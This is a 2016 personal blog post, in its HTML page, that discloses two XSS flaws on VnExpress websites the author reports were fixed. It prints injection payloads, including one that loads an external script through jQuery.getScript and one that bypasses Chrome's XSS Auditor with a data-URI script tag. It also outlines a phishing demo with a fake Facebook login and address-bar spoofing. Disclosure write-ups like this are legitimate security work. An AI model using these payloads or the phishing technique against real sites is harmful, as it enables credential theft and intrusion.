<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>XSS vulnerabilities on VnExpress</title>

  <meta name="author" content="Cong Nguyen" />
  
  

  <meta name="generator" content="Hugo 0.15" />

  <link rel="alternate" href="http://blog.ntcong.it/index.xml" type="application/rss+xml" title="Cong Nguyen">

  <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" />
  <link rel="stylesheet" href="http://blog.ntcong.it/css/bootstrap.min.css" />
  <link rel="stylesheet" href="http://blog.ntcong.it/css/main.css" />
  <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
  <link rel="stylesheet" href="http://blog.ntcong.it/css/pygment_highlights.css" />
  
  
  <meta property="og:title" content="XSS vulnerabilities on VnExpress" />
  <meta property="og:type" content="website" />
  <meta property="og:url" content="/" />
  <meta property="og:image" content="/img/avatar.png" />
  
</head>


  <body>

    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="http://blog.ntcong.it/">Cong Nguyen</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
      
        
          <li>
          <a title="About" href="/about/">About</a>
  	      </li>
  	    
      
        
          <li>
          <a title="Blog" href="/">Blog</a>
  	      </li>
  	    
      
      </ul>
    </div>

	<div class="avatar-container">
	  <div class="avatar-img-border">
      
          <a title="Cong Nguyen" href="http://blog.ntcong.it/">
              <img class="avatar-img" src="http://blog.ntcong.it//img/avatar.png" alt="Cong Nguyen" />
          </a>
      
	  </div>
	</div>

  </div>
</nav>


    <div role="main" class="container main-content">

      
        





<header class="header-section ">

<div class="intro-header no-img">
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="post-heading">
          <h1>XSS vulnerabilities on VnExpress</h1>
      
      
      
      <span class="post-meta">Posted on March 22, 2016</span>
      
        </div>
      </div>
    </div>
  </div>
</div>
</header>




<div class="container">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
          

<h1 id="xss-on-e-vnexpress-net:3b2adbfb4f5b591fc123309bb7eb9de1">XSS on e.vnexpress.net</h1>

<p>Recently I found two XSS vulnerabilities on vnExpress website. It all begins with the newly introduced English version of VnExpress, and I didn&rsquo;t have to spend a lot of time to find the search box wasn&rsquo;t escaped properly. Just do a search with &ldquo;&gt; will reveal this.</p>


<figure >
    
        <img src="/img/vne/vne1.png" />
    
    
    <figcaption>
        <h4>XSS on e.VNE</h4>
        
    </figcaption>
    
</figure>


<p>Pretty serious problem if anyone still doesn&rsquo;t care about escaping user-input, especially on a search box. Luckily, a normal XSS payload will only works on Firefox, because Chrome and IE have XSS Auditor for a while now (you can still bypass it, which I will tell you later). Also because the site doesn&rsquo;t have user account yet, the best I can do is launching a phishing attack (I jut did a PoC to demo what I can do, not really attack anyone).</p>

<p>Phishing is also a serious problem for a big website like VnExpress. People trained to trust VnE and will do most thing the website told them to (like give Facebook&rsquo;s password). So it&rsquo;s pretty simple, I can inject my script in the search page already, I load the main site with jQuery.get, replace the top post with a fake Facebook login, replace the HTML content, and then use window.history.pushState to replace the address bar. This way the site will display the main page with its url, not the search page.</p>

<p>But it&rsquo;s still not very good since it only works on Firefox, so I did a quick look at the HTML source code and found this</p>

<div class="highlight"><pre><code class="language-js" data-lang="js"><span></span><span class="kd">var</span> <span class="nx">strKeyWord</span>  <span class="o">=</span> <span class="s2">&quot;&quot;</span><span class="o">&gt;</span><span class="err">&quot;</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">blData</span>      <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div>


<p>Why they include the search parameter on a Javascript code, without any protection is beyond me, but this will bypass all the protection XSS Auditor provides to you, because it&rsquo;s not a normal XSS payload anymore, any text you inputed in will run on javascript directly. The new payload will look like this.
<div class="highlight"><pre><code class="language-js" data-lang="js"><span></span><span class="s2">&quot;;alert(1);&quot;</span>
</code></pre></div>
</p>

<p>And it will not be detected by Chrome or IE&rsquo;s XSS Auditor. Extensible is a must, so I load the script from outside
<div class="highlight"><pre><code class="language-js" data-lang="js"><span></span><span class="s2">&quot;;jQuery.getScript(&quot;</span><span class="nx">http</span><span class="o">:</span><span class="c1">//js.js&quot;) .done(function() {});&quot;</span>
</code></pre></div>
</p>

<p>Pretty neat, huh?</p>

<p>What should I do to prevent it? Well XSS is never a simple problem to begin with, but at least never ever trust anything the user input, escape it, whitelist the character, make sure they don&rsquo;t input any special characacter, because no one want to search an article with &ldquo;;&rdquo;@(alert(1));&rdquo; anyway. And NEVER use the input directly onto your javascript, it is very dangerous.</p>

<h1 id="xss-on-vnexpress-net:3b2adbfb4f5b591fc123309bb7eb9de1">XSS on vnexpress.net</h1>

<p>Then I thought, if they fucked up this bad on their new site, the main site should have some weakness as well. One thing they did a little better is, the main search box is properly escaped, but I noticed they put the whole URL onto the Time and Sort filter, so maybe something will not be escaped, like the &ldquo;search_f=&rdquo; parameter.</p>

<pre><code>http://timkiem.vnexpress.net/?search_f=%22%3E&amp;q=xss&amp;cate_code=&amp;media_type=all&amp;latest=&amp;fromdate=0&amp;todate=0&amp;date_format=all
</code></pre>


<figure >
    
        <img src="/img/vne/vne2.png" />
    
    
    <figcaption>
        <h4>XSS on VNE</h4>
        
    </figcaption>
    
</figure>


<p>This time there&rsquo;s no javascript bug on this page, but working only with Firefox is no fun, let&rsquo;s find out how to bypass Chrome.</p>

<p>So Chrome did a great job to find a XSS payload on the URL, and prevent it from running. But there&rsquo;s a flaw: it won&rsquo;t stop an invalid XSS payload, like a script without closing tag. And the HTML parse won&rsquo;t care about the content inside the <script> tag, as long as you include a src attribute. This payload requires you to have a closing </script> tag, which most website nowaday have to execute javascript after the main content finishes loading. The payload looks like this</p>

<p><div class="highlight"><pre><code class="language-js" data-lang="js"><span></span><span class="err">&quot;</span><span class="o">&gt;&lt;</span><span class="nx">script</span><span class="o">/</span><span class="nx">src</span><span class="o">=</span><span class="nx">data</span><span class="o">:</span><span class="p">,</span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o">%</span><span class="mi">26</span><span class="nx">sol</span><span class="p">;</span><span class="o">%</span><span class="mi">26</span><span class="nx">sol</span><span class="p">;</span>
</code></pre></div>
</p>

<p>The result html will looks like this: &lt;script src=&ldquo;data:,alert(1)//&amp;q=xss&hellip;.&ldquo;&gt;[a lot of HTML]&lt;/script&gt;. Andddd it runs on Chrome. And also it&rsquo;s pretty funny to see VnExpress do some weird shit with their site, results in the alert(1) display several times when the page loads (view count increase maybe?)</p>

<p>Kudos to VnExpress for fixing the bug pretty fast after I reported it to them. But I think they should do something better than having a XSS vuln on the main search box in the first place.</p>

      </article>

      <ul class="pager blog-pager">
        
        <li class="previous">
          <a href="http://blog.ntcong.it/post/how-vcb-do-otp-or-how-not-to-do-it/" data-toggle="tooltip" data-placement="top" title="How VCB OTP works and How not to do it">&larr; Previous Post</a>
        </li>
        
        
      </ul>

      
      <div class="disqus-comments">
        <div id="disqus_thread"></div>
<script type="text/javascript">
    var disqus_shortname = 'ntcongit';
    var disqus_identifier = 'http:\/\/blog.ntcong.it\/post\/xss-with-vnexpress\/';
    var disqus_title = 'XSS vulnerabilities on VnExpress';
    var disqus_url = 'http:\/\/blog.ntcong.it\/post\/xss-with-vnexpress\/';

    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
      </div>
      

    </div>
  </div>
</div>

      

      
      <div class="row disqus-comments">
        <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
          <div id="disqus_thread"></div>
<script type="text/javascript">
    var disqus_shortname = 'ntcongit';
    var disqus_identifier = 'http:\/\/blog.ntcong.it\/post\/xss-with-vnexpress\/';
    var disqus_title = 'XSS vulnerabilities on VnExpress';
    var disqus_url = 'http:\/\/blog.ntcong.it\/post\/xss-with-vnexpress\/';

    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
        </div>
      </div>
      

    </div>

    <footer>
  <div class="container beautiful-jekyll-footer">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
          <li>
            <a href="https://www.facebook.com/ntcong.it" title="Facebook">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-facebook fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
          
          <li>
            <a href="https://github.com/ntcong" title="GitHub">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-github fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
		      
		      
          <li>
            <a href="mailto:ntcong.it@gmail.com" title="Email me">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-envelope fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
		      
          <li>
            <a href="https://linkedin.com/in/ntcong" title="LinkedIn">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-linkedin fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
	    	  
          <li>
            <a href="https://stackoverflow.com/users/104011/fu4ny" title="StackOverflow">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-stack-overflow fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          

    		  <li>
      			<a href="http://blog.ntcong.it/index.xml" title="RSS">
      			  <span class="fa-stack fa-lg">
        				<i class="fa fa-circle fa-stack-2x"></i>
        				<i class="fa fa-rss fa-stack-1x fa-inverse"></i>
      			  </span>
      			</a>
    		  </li>		

        </ul>
        <p class="copyright text-muted">
    		  Cong Nguyen
    		  &nbsp;&bull;&nbsp;
    		  2016
    		  
    		  
    		  &nbsp;&bull;&nbsp;
    		  <a href="http://blog.ntcong.it/">Cong Nguyen</a>
    		  
  	    </p>
  	        
    		<p class="theme-by text-muted">
    		  Theme by
    		  <a href="http://deanattali.com/beautiful-jekyll/">beautiful-jekyll</a>
    		</p>
      </div>
    </div>
  </div>
</footer>

<script src="http://blog.ntcong.it/js/jquery-1.11.2.min.js"></script>
<script src="http://blog.ntcong.it/js/bootstrap.min.js"></script>
<script src="http://blog.ntcong.it/js/main.js"></script>


<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-76172988-1', 'auto');
ga('send', 'pageview');
</script>


  </body>
</html>
